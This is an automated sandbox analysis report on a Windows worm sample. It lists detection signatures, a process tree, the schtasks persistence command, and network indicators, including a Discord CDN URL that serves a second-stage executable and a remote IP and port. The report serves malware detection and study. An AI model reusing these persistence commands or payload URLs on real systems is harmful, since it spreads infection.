
Windows Analysis Report
провера_блокнота.scr.exe

Overview

General Information

Sample Name: провера_блокнота.scr.exe
Original Sample Name: _.scr.exe
Analysis ID: 1331098
MD5: d88092aabd3af3ba4ef626c31962626e
SHA1: 95235b832c708dbf13bd7697de37c81ef70ab2b5
SHA256: 12dcbc603c08faaf1fba0596ebd8bea58713f313540730109957514747be1bac
Tags: exe, keygroup, Worm

Detection

Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Detected VMProtect packer
Creates multiple autostart registry keys
Drops PE files to the startup folder
Drops PE files with a suspicious file extension
Machine Learning detection for sample
.NET source code contains potential unpacker
Creates autostart registry keys with suspicious values (likely registry only malware)
Machine Learning detection for dropped file
Drops or copies cmd.exe with a different name (likely to bypass HIPS)
Uses schtasks.exe or at.exe to add and modify task schedules
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
One or more processes crash
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
PE file contains sections with non-standard names
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Stores files to the Windows start menu directory
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to call native functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Uses insecure TLS / SSL version for HTTPS connection
Entry point lies outside standard sections
Contains long sleeps (>= 3 min)
May check the online IP address of the machine
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
AV process strings found (often used to terminate AV products)
Sample file is different than original file name gathered from version info
Drops PE files
Detected TCP or UDP traffic on non-standard ports
Checks if the current process is being debugged
Creates a start menu entry (Start Menu\Programs\Startup)
Creates a process in suspended mode (likely to inject code)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)

Classification

  • System is w10x64
  • провера_блокнота.scr.exe (PID: 6620 cmdline: C:\Users\user\Desktop\провера_блокнота.scr.exe MD5: D88092AABD3AF3BA4EF626C31962626E)
    • fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.scr (PID: 1476 cmdline: "C:\Users\user\AppData\Roaming\RHmhiglWQXBcNdhjbBdI\socxnesDllYLlIVjQiUY\1.0.0.0\fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.scr" /S MD5: 2F621D531B27FF6BCF35DB5412A879BF)
      • schtasks.exe (PID: 7192 cmdline: C:\Windows\System32\schtasks.exe" /create /f /sc minute /mo 1 /tn "fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ" /tr "C:\Users\user\AppData\Roaming\fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.scr MD5: 76CD6626DD8834BD4A42E6A565104DC2)
        • conhost.exe (PID: 7200 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • WerFault.exe (PID: 8088 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6620 -s 2696 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.scr (PID: 7776 cmdline: "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.scr" /S MD5: 2F621D531B27FF6BCF35DB5412A879BF)
  • cleanup
No configs have been found
No yara matches
No Sigma rule has matched
No Snort rule has matched


AV Detection

Source: ideas-teams.at.ply.gg | Virustotal: Detection: 7%
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.scr | ReversingLabs: Detection: 91%
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.scr | Virustotal: Detection: 51%
Source: C:\Users\user\AppData\Roaming\RHmhiglWQXBcNdhjbBdI\socxnesDllYLlIVjQiUY\1.0.0.0\fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.scr | ReversingLabs: Detection: 91%
Source: C:\Users\user\AppData\Roaming\RHmhiglWQXBcNdhjbBdI\socxnesDllYLlIVjQiUY\1.0.0.0\fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.scr | Virustotal: Detection: 51%
Source: C:\Users\user\AppData\Roaming\RHmhiglWQXBcNdhjbBdI\socxnesDllYLlIVjQiUY\1.0.0.0\wininit.scr | ReversingLabs: Detection: 39%
Source: C:\Users\user\AppData\Roaming\fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.scr | ReversingLabs: Detection: 91%
Source: C:\Users\user\AppData\Roaming\fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.scr | Virustotal: Detection: 51%
Source: провера_блокнота.scr.exe | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\RHmhiglWQXBcNdhjbBdI\socxnesDllYLlIVjQiUY\1.0.0.0\wininit.scr | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\RHmhiglWQXBcNdhjbBdI\socxnesDllYLlIVjQiUY\1.0.0.0\fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.scr | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.scr | Joe Sandbox ML: detected
Source: провера_блокнота.scr.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown | HTTPS traffic detected: 162.159.135.233:443 -> 192.168.2.5:49714 version: TLS 1.0
Source: провера_блокнота.scr.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: System.Xml.ni.pdb source: WER96C9.tmp.dmp.13.dr
Source: Binary string: Accessibility.pdb source: WER96C9.tmp.dmp.13.dr
Source: Binary string: System.ni.pdbRSDS source: WER96C9.tmp.dmp.13.dr
Source: Binary string: System.Deployment.pdb source: WER96C9.tmp.dmp.13.dr
Source: Binary string: System.Configuration.ni.pdb source: WER96C9.tmp.dmp.13.dr
Source: Binary string: mscorlib.ni.pdbRSDS source: WER96C9.tmp.dmp.13.dr
Source: Binary string: Accessibility.pdb4v source: WER96C9.tmp.dmp.13.dr
Source: Binary string: System.Configuration.pdb source: WER96C9.tmp.dmp.13.dr
Source: Binary string: System.Xml.pdb source: WER96C9.tmp.dmp.13.dr
Source: Binary string: System.pdb source: WER96C9.tmp.dmp.13.dr
Source: Binary string: System.Xml.ni.pdbRSDS# source: WER96C9.tmp.dmp.13.dr
Source: Binary string: System.Core.ni.pdb source: WER96C9.tmp.dmp.13.dr
Source: Binary string: Microsoft.VisualBasic.pdb source: WER96C9.tmp.dmp.13.dr
Source: Binary string: System.Drawing.pdb$0<2a@ source: WER96C9.tmp.dmp.13.dr
Source: Binary string: Microsoft.VisualBasic.pdb0_ source: WER96C9.tmp.dmp.13.dr
Source: Binary string: System.Windows.Forms.pdb source: WER96C9.tmp.dmp.13.dr
Source: Binary string: mscorlib.pdb source: WER96C9.tmp.dmp.13.dr
Source: Binary string: System.Drawing.pdb source: WER96C9.tmp.dmp.13.dr
Source: Binary string: mscorlib.ni.pdb source: WER96C9.tmp.dmp.13.dr
Source: Binary string: System.Core.pdb< source: WER96C9.tmp.dmp.13.dr
Source: Binary string: System.Core.pdb source: WER96C9.tmp.dmp.13.dr
Source: Binary string: System.pdb| source: WER96C9.tmp.dmp.13.dr
Source: Binary string: System.Configuration.ni.pdbRSDScUN source: WER96C9.tmp.dmp.13.dr
Source: Binary string: System.ni.pdb source: WER96C9.tmp.dmp.13.dr
Source: Binary string: System.Core.ni.pdbRSDS source: WER96C9.tmp.dmp.13.dr
Source: C:\Users\user\AppData\Roaming\RHmhiglWQXBcNdhjbBdI\socxnesDllYLlIVjQiUY\1.0.0.0\fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.scr | File opened: C:\Users\user\AppData\Roaming\RHmhiglWQXBcNdhjbBdI\socxnesDllYLlIVjQiUY\1.0.0.0\
Source: C:\Users\user\AppData\Roaming\RHmhiglWQXBcNdhjbBdI\socxnesDllYLlIVjQiUY\1.0.0.0\fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.scr | File opened: C:\Users\user\AppData\
Source: C:\Users\user\AppData\Roaming\RHmhiglWQXBcNdhjbBdI\socxnesDllYLlIVjQiUY\1.0.0.0\fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.scr | File opened: C:\Users\user\AppData\Roaming\RHmhiglWQXBcNdhjbBdI\
Source: C:\Users\user\AppData\Roaming\RHmhiglWQXBcNdhjbBdI\socxnesDllYLlIVjQiUY\1.0.0.0\fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.scr | File opened: C:\Users\user\
Source: C:\Users\user\AppData\Roaming\RHmhiglWQXBcNdhjbBdI\socxnesDllYLlIVjQiUY\1.0.0.0\fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.scr | File opened: C:\Users\user\AppData\Roaming\RHmhiglWQXBcNdhjbBdI\socxnesDllYLlIVjQiUY\
Source: C:\Users\user\AppData\Roaming\RHmhiglWQXBcNdhjbBdI\socxnesDllYLlIVjQiUY\1.0.0.0\fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.scr | File opened: C:\Users\user\AppData\Roaming\
Source: Joe Sandbox View | JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Source: global traffic | HTTP traffic detected: GET /attachments/1161633037004587060/1161731056462995496/lient.exe HTTP/1.1 | Host: cdn.discordapp.com | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1 | Host: ip-api.com | Connection: Keep-Alive
Source: Joe Sandbox View | IP Address: 208.95.112.1
Source: unknown | DNS query: name: ip-api.com
Source: global traffic | TCP traffic: 192.168.2.5:49716 -> 209.25.140.229:54323
Source: unknown | Network traffic detected: HTTP traffic on port 49714 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49714
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: провера_блокнота.scr.exe, 00000000.00000002.2721666334.0000000002EF1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://cdn.discordapp.com
Source: провера_блокнота.scr.exe, wininit.scr.0.dr | String found in binary or memory: http://cdn.discordapp.com/attachments/1161633037004587060/1161731056462995496/lient.exe
Source: fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.scr, 00000002.00000002.3239287368.00000000027D9000.00000004.00000800.00020000.00000000.sdmp, fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.scr, 00000002.00000002.3239287368.0000000002819000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://ip-api.com
Source: провера_блокнота.scr.exe, 00000000.00000002.2721666334.0000000002EF1000.00000004.00000800.00020000.00000000.sdmp, fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.scr, 00000002.00000002.3239287368.00000000027D9000.00000004.00000800.00020000.00000000.sdmp, fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.scr, 00000002.00000002.3239287368.0000000002761000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: Amcache.hve.13.dr | String found in binary or memory: http://upx.sf.net
Source: провера_блокнота.scr.exe, wininit.scr.0.dr | String found in binary or memory: http://www.whatsmyip.us/showipsimple.php
Source: провера_блокнота.scr.exe, 00000000.00000002.2721666334.0000000002F32000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://cdn.discordapp.com
Source: провера_блокнота.scr.exe, 00000000.00000002.2721666334.0000000002F32000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://cdn.discordapp.com/attachments/1161633037004587060/1161731056462995496/lient.exe
Source: unknown | DNS traffic detected: queries for: cdn.discordapp.com

System Summary

Source: wininit.scr.0.dr | Static PE information: .vmp0 and .vmp1 section names
Source: провера_блокнота.scr.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: C:\Users\user\Desktop\провера_блокнота.scr.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6620 -s 2696
Source: C:\Users\user\Desktop\провера_блокнота.scr.exe | Code function: 0_2_01448810
Source: C:\Users\user\Desktop\провера_блокнота.scr.exe | Code function: 0_2_0144C340
Source: C:\Users\user\Desktop\провера_блокнота.scr.exe | Code function: 0_2_0144DA68
Source: C:\Users\user\Desktop\провера_блокнота.scr.exe | Code function: 0_2_0144CA10
Source: C:\Users\user\Desktop\провера_блокнота.scr.exe | Code function: 0_2_0144F2A8
Source: C:\Users\user\Desktop\провера_блокнота.scr.exe | Code function: 0_2_01440C90
Source: C:\Users\user\Desktop\провера_блокнота.scr.exe | Code function: 0_2_01449690
Source: C:\Users\user\Desktop\провера_блокнота.scr.exe | Code function: 0_2_0144B933
Source: C:\Users\user\Desktop\провера_блокнота.scr.exe | Code function: 0_2_0144F80F
Source: C:\Users\user\Desktop\провера_блокнота.scr.exe | Code function: 0_2_0144B318
Source: C:\Users\user\Desktop\провера_блокнота.scr.exe | Code function: 0_2_0144CA01
Source: C:\Users\user\Desktop\провера_блокнота.scr.exe | Code function: 0_2_01440A60
Source: C:\Users\user\Desktop\провера_блокнота.scr.exe | Code function: 0_2_01440C80
Source: C:\Users\user\Desktop\провера_блокнота.scr.exe | Code function: 0_2_0144B708
Source: C:\Users\user\Desktop\провера_блокнота.scr.exe | Code function: 0_2_0144BFD7
Source: C:\Users\user\Desktop\провера_блокнота.scr.exe | Code function: 0_2_0144B785
Source: C:\Users\user\Desktop\провера_блокнота.scr.exe | Code function: 0_2_0144E62A
Source: C:\Users\user\Desktop\провера_блокнота.scr.exe | Code function: 0_2_02DD0BE8
Source: C:\Users\user\Desktop\провера_блокнота.scr.exe | Code function: 0_2_02DDCB10
Source: C:\Users\user\Desktop\провера_блокнота.scr.exe | Code function: 0_2_02DD6900
Source: C:\Users\user\Desktop\провера_блокнота.scr.exe | Code function: 0_2_02DDB904
Source: C:\Users\user\Desktop\провера_блокнота.scr.exe | Code function: 0_2_02DD1D40
Source: C:\Users\user\Desktop\провера_блокнота.scr.exe | Code function: 0_2_02DD617E
Source: C:\Users\user\Desktop\провера_блокнота.scr.exe | Code function: 0_2_02DD0BD9
Source: C:\Users\user\Desktop\провера_блокнота.scr.exe | Code function: 0_2_02DD68F4
Source: C:\Users\user\Desktop\провера_блокнота.scr.exe | Code function: 0_2_02DD2E08
Source: C:\Users\user\Desktop\провера_блокнота.scr.exe | Code function: 0_2_02DD2DF8
Source: C:\Users\user\Desktop\провера_блокнота.scr.exe | Code function: 0_2_02DD6D90
Source: C:\Users\user\Desktop\провера_блокнота.scr.exe | Code function: 0_2_02DD6DA0
Source: C:\Users\user\Desktop\провера_блокнота.scr.exe | Code function: 0_2_02DD3380
Source: C:\Users\user\Desktop\провера_блокнота.scr.exe | Code function: 0_2_02DD5718
Source: C:\Users\user\Desktop\провера_блокнота.scr.exe | Code function: 0_2_02DD3597
Source: C:\Users\user\Desktop\провера_блокнота.scr.exe | Code function: 0_2_02DDBA50
Source: C:\Users\user\Desktop\провера_блокнота.scr.exe | Code function: 0_2_02DDBA40
Source: C:\Users\user\Desktop\провера_блокнота.scr.exe | Code function: 0_2_02DD3BC9
Source: C:\Users\user\Desktop\провера_блокнота.scr.exe | Code function: 0_2_02DDB8F8
Source: C:\Users\user\Desktop\провера_блокнота.scr.exe | Code function: 0_2_02DDD870
Source: C:\Users\user\Desktop\провера_блокнота.scr.exe | Code function: 0_2_02DD3995
Source: C:\Users\user\Desktop\провера_блокнота.scr.exe | Code function: 0_2_02DD5FD5
Source: C:\Users\user\Desktop\провера_блокнота.scr.exe | Code function: 0_2_02DD5DF8
Source: C:\Users\user\Desktop\провера_блокнота.scr.exe | Code function: 0_2_09AC9CA0
Source: C:\Users\user\Desktop\провера_блокнота.scr.exe | Code function: 0_2_09ACB048
Source: C:\Users\user\AppData\Roaming\RHmhiglWQXBcNdhjbBdI\socxnesDllYLlIVjQiUY\1.0.0.0\fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.scr | Code function: 2_2_00007FF848359967
Source: C:\Users\user\AppData\Roaming\RHmhiglWQXBcNdhjbBdI\socxnesDllYLlIVjQiUY\1.0.0.0\fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.scr | Code function: 2_2_00007FF848357632
Source: C:\Users\user\AppData\Roaming\RHmhiglWQXBcNdhjbBdI\socxnesDllYLlIVjQiUY\1.0.0.0\fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.scr | Code function: 2_2_00007FF848352301
Source: C:\Users\user\AppData\Roaming\RHmhiglWQXBcNdhjbBdI\socxnesDllYLlIVjQiUY\1.0.0.0\fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.scr | Code function: 2_2_00007FF848350855
Source: C:\Users\user\AppData\Roaming\RHmhiglWQXBcNdhjbBdI\socxnesDllYLlIVjQiUY\1.0.0.0\fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.scr | Code function: 2_2_00007FF848356886
Source: C:\Users\user\AppData\Roaming\RHmhiglWQXBcNdhjbBdI\socxnesDllYLlIVjQiUY\1.0.0.0\fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.scr | Code function: 2_2_00007FF848356389
Source: C:\Users\user\AppData\Roaming\fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.scr | Code function: 7_2_00007FF848370715
Source: C:\Users\user\AppData\Roaming\fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.scr | Code function: 7_2_00007FF8483707E0
Source: C:\Users\user\AppData\Roaming\fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.scr | Code function: 8_2_00007FF848370715
Source: C:\Users\user\AppData\Roaming\fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.scr | Code function: 8_2_00007FF8483707E0
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.scr | Code function: 9_2_00007FF848360715
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.scr | Code function: 9_2_00007FF8483607E0
Source: C:\Users\user\Desktop\провера_блокнота.scr.exe | Code function: 0_2_0144F030 NtQueryInformationProcess
Source: C:\Users\user\Desktop\провера_блокнота.scr.exe | Code function: 0_2_0144EFC9 NtQueryInformationProcess
Source: C:\Users\user\Desktop\провера_блокнота.scr.exe | Code function: 0_2_0144EFF0 NtQueryInformationProcess
Source: провера_блокнота.scr.exe, 00000000.00000002.2721666334.0000000002EF1000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilename vs провера_блокнота.scr.exe
Source: провера_блокнота.scr.exe, 00000000.00000002.2720682283.0000000000F88000.00000004.00000010.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameUNKNOWN_FILET vs провера_блокнота.scr.exe
Source: провера_блокнота.scr.exe, 00000000.00000002.2720578515.0000000000B8B000.00000020.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenameVMProtect.Runtime.dllD vs провера_блокнота.scr.exe
Source: провера_блокнота.scr.exe, 00000000.00000002.2720847952.00000000010EE000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameclr.dllT vs провера_блокнота.scr.exe
Source: провера_блокнота.scr.exe, 00000000.00000000.1974894555.0000000000BB6000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenameworm.exeL vs провера_блокнота.scr.exe
Source: провера_блокнота.scr.exe, 00000000.00000002.2721666334.0000000002F5C000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamecmdi.exel% vs провера_блокнота.scr.exe
Source: провера_блокнота.scr.exe | Binary or memory string: OriginalFilenameworm.exeL vs провера_блокнота.scr.exe
Source: C:\Users\user\Desktop\провера_блокнота.scr.exe | File read: C:\Users\user\Desktop\провера_блокнота.scr.exe
Source: C:\Users\user\Desktop\провера_блокнота.scr.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown | Process created: C:\Users\user\Desktop\провера_блокнота.scr.exe C:\Users\user\Desktop\провера_блокнота.scr.exe
Source: C:\Users\user\Desktop\провера_блокнота.scr.exe | Process created: C:\Users\user\AppData\Roaming\RHmhiglWQXBcNdhjbBdI\socxnesDllYLlIVjQiUY\1.0.0.0\fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.scr "C:\Users\user\AppData\Roaming\RHmhiglWQXBcNdhjbBdI\socxnesDllYLlIVjQiUY\1.0.0.0\fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.scr" /S
Source: C:\Users\user\AppData\Roaming\RHmhiglWQXBcNdhjbBdI\socxnesDllYLlIVjQiUY\1.0.0.0\fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.scr | Process created: C:\Windows\System32\schtasks.exe C:\Windows\System32\schtasks.exe" /create /f /sc minute /mo 1 /tn "fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ" /tr "C:\Users\user\AppData\Roaming\fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.scr
Source: C:\Windows\System32\schtasks.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Users\user\AppData\Roaming\fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.scr "C:\Users\user\AppData\Roaming\fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.scr" /S
Source: unknown | Process created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.scr "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.scr" /S
Source: C:\Users\user\AppData\Roaming\RHmhiglWQXBcNdhjbBdI\socxnesDllYLlIVjQiUY\1.0.0.0\fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.scr | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32
Source: C:\Users\user\Desktop\провера_блокнота.scr.exe | File created: C:\Users\user\AppData\Roaming\RHmhiglWQXBcNdhjbBdI
Source: C:\Windows\SysWOW64\WerFault.exe | File created: C:\ProgramData\Microsoft\Windows\WER\Temp\c08e40ea-c13e-471a-97ce-fd966f32454c
Source: classification engine | Classification label: mal100.adwa.evad.winEXE@10/11@3/3
Source: C:\Users\user\Desktop\провера_блокнота.scr.exe | File read: C:\Users\user\Desktop\desktop.ini
Source: fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.scr.0.dr, g.cs | Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.scr.0.dr, g.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.scr0.2.dr, g.cs | Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.scr0.2.dr, g.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.scr.2.dr, g.cs | Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.scr.2.dr, g.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: провера_блокнота.scr.exe | Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
Source: C:\Users\user\Desktop\провера_блокнота.scr.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a403a0b75e95c07da2caa7f780446a62\mscorlib.ni.dll
Source: C:\Users\user\AppData\Roaming\RHmhiglWQXBcNdhjbBdI\socxnesDllYLlIVjQiUY\1.0.0.0\fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.scr | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\b8493bec853ac702d2188091d76ccffa\mscorlib.ni.dll
Source: C:\Users\user\AppData\Roaming\fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.scr | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\b8493bec853ac702d2188091d76ccffa\mscorlib.ni.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.scr | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\b8493bec853ac702d2188091d76ccffa\mscorlib.ni.dll
Source: C:\Windows\SysWOW64\WerFault.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a403a0b75e95c07da2caa7f780446a62\mscorlib.ni.dll
Source: C:\Users\user\AppData\Roaming\RHmhiglWQXBcNdhjbBdI\socxnesDllYLlIVjQiUY\1.0.0.0\fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.scr | Mutant created: \Sessions\1\BaseNamedObjects\4LGIL4kGMXwd2NML
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7200:120:WilError_03
Source: C:\Windows\SysWOW64\WerFault.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6620
Source: fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.scr.0.dr, g.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.scr.2.dr, g.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.scr0.2.dr, g.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.scr0.2.dr, g.csCryptographic APIs: 'TransformFinalBlock'
Source: #U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: #U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: System.Xml.ni.pdb source: WER96C9.tmp.dmp.13.dr
Source: Binary string: Accessibility.pdb source: WER96C9.tmp.dmp.13.dr
Source: Binary string: System.ni.pdbRSDS source: WER96C9.tmp.dmp.13.dr
Source: Binary string: System.Deployment.pdb source: WER96C9.tmp.dmp.13.dr
Source: Binary string: System.Configuration.ni.pdb source: WER96C9.tmp.dmp.13.dr
Source: Binary string: mscorlib.ni.pdbRSDS source: WER96C9.tmp.dmp.13.dr
Source: Binary string: Accessibility.pdb4v source: WER96C9.tmp.dmp.13.dr
Source: Binary string: System.Configuration.pdb source: WER96C9.tmp.dmp.13.dr
Source: Binary string: System.Xml.pdb source: WER96C9.tmp.dmp.13.dr
Source: Binary string: System.pdb source: WER96C9.tmp.dmp.13.dr
Source: Binary string: System.Xml.ni.pdbRSDS# source: WER96C9.tmp.dmp.13.dr
Source: Binary string: System.Core.ni.pdb source: WER96C9.tmp.dmp.13.dr
Source: Binary string: Microsoft.VisualBasic.pdb source: WER96C9.tmp.dmp.13.dr
Source: Binary string: System.Drawing.pdb$0<2a@ source: WER96C9.tmp.dmp.13.dr
Source: Binary string: Microsoft.VisualBasic.pdb0_ source: WER96C9.tmp.dmp.13.dr
Source: Binary string: System.Windows.Forms.pdb source: WER96C9.tmp.dmp.13.dr
Source: Binary string: mscorlib.pdb source: WER96C9.tmp.dmp.13.dr
Source: Binary string: System.Drawing.pdb source: WER96C9.tmp.dmp.13.dr
Source: Binary string: mscorlib.ni.pdb source: WER96C9.tmp.dmp.13.dr
Source: Binary string: System.Core.pdb< source: WER96C9.tmp.dmp.13.dr
Source: Binary string: System.Core.pdb source: WER96C9.tmp.dmp.13.dr
Source: Binary string: System.pdb| source: WER96C9.tmp.dmp.13.dr
